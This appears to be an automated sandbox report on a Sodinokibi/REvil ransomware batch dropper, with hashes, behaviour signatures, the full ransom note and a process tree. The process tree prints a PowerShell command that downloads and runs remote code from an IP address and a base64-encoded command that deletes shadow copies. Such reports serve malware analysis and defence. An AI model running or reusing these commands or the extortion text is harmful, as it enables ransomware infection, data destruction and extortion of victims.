Analysis

  • max time kernel
    145s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 20:10

General

  • Target

    55022f44a9c2dac0916e9db3842398df.bat

  • Size

    219B

  • MD5

    07ea4461f7fc0758bb7fb455966df5d9

  • SHA1

    2df15ea78ad89a7816a69bab5656274115bed854

  • SHA256

    dd540cd255b16f023dee940fffa52d054726d7f2c1c9aeaeafc4f594a3e2a5f1

  • SHA512

    b0ea53a6359157114b09bddf227d1bfedcd7db302c356e99e1086b736fc003b6a2f40647a6feecf6f5642104bbf8e7b9a49668c29a5f1c0857fcf1538419414d

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df

Extracted

Path

C:\32rjr23-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 32rjr23. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/364473B984C95D99 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/364473B984C95D99 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: BzJU1zJIBy4aN/v7dHVRLAqJkukZOgSXMMQo3GJHxpWIL5hkWqWO1VwDOsYWWGQS ierLaBs1E7nXdKkHHRCJ3VBfpwmQc3d84fClhPJc1+T8e+xMOxX1+PFpXNP1/eG7 UJZvQ1MuOhA0weyqEOHsw0v5aR9yrlpmcVOOP162QDPp5MoZs08lwqq9YahxInPd vB+f5BgeoVnmGyBlBHj2ilSVqmcHMWlDCXZqLO75NOsxpbdYuMgdj+vkiTDw1pSv IObJUDb/cNEWOobfBXkKs3DNqizYzGCJBhx5AxJPkSUdJrHzAskHB2dNcJRzMYeA ZMk2aRTRTVpNqAg/p1mikTUUAPdFYE9kF/Cwe4K8eWplMo39gZTGGL9CK1s+Dbsk nS/daNyDXD3VhTJV19RVvSvG3Y7wU1wMDI6AJ1qH3dCgO+h/4NpDAVVeJXQdflTW DylYaXZ7p3qRX55iejCs40RFcT4EBn2vfi7Px4yU6iEM1K9nLsi53LwP40HHaXlS 90lhFlmv4N4uRfqyHFZ8AjdXt3iRvqnoXHhKL4uyxrFWx6zJGz+GUceyDtZT/2RE APEL0zo16c6yFV8YRw7lSd0Z9YrgQa+yrRcaDa56HPmkmflWLIs+Fdl++PeBihcQ by2CotByDCkwKvIgE8EMfvN5V9w9hZ0Yvl4uBXcCpCuoqDhn1RAx6/hqPx6iwWd8 Wu8k3o1qkfI+U1j1uQXoygXM4DBcKUZpT9Uw/TfhxH2Jy+Ho6hv8mSn3sGGeUm+q vjUe7CVlabAK2OSGVZXk3LSZnXOG1+FB78XAoD1+14cnzFwHfgtOoT4DU3wgF3eC m2v+BREOOHVotJQf06SA6zeLpDrKtfd9yTSDwT1LdcPnR9Oy293lzXZOq+dJQ/4z oLrKk8bb8q9tD8PlukDulEOooo0DAUzSE0i0BybJhmqnlbjQ1VQrjLA5igGE6wUo cAf30S/EVpWCBGJX7J2W2A3VtnLCB7bVMkUiy0/+Yy3pKG+++rTdNSGqLx3h22dy f1zjjqkhhGluK0kdHhDxH4YP3p7H+x7eiYitD2/d3kVnEBceoPjhDtJz0KE90qwK WlE/ku7jcj6CKibH6SwQY5MooVRQ9MksRxrQGy95Zo2wwvbGpuT7XzhRGIWA0Mb/ 8iMgdXULzSSvMXfJVOAiecRJvNY4BXR4uci11ea6Und1HYobFJadIkY14f1HhBPs OaBqdnTRgfVxwpEnCknJ0WJO70bDcuABVj+bYgTgTxZezryaj78xDBXgBYkreYKx P5wtkFYaU+k7yEdtZXjynNQKfoS/CQtDz/H/ByDbPkEHZw== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/364473B984C95D99

http://decryptor.cc/364473B984C95D99

Signatures

  • Enumerates connected drives 3 TTPs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\55022f44a9c2dac0916e9db3842398df.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/55022f44a9c2dac0916e9db3842398df');Invoke-PJRBBLOXXKAL;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Drops file in Program Files directory
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:1396
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1100
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:656

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms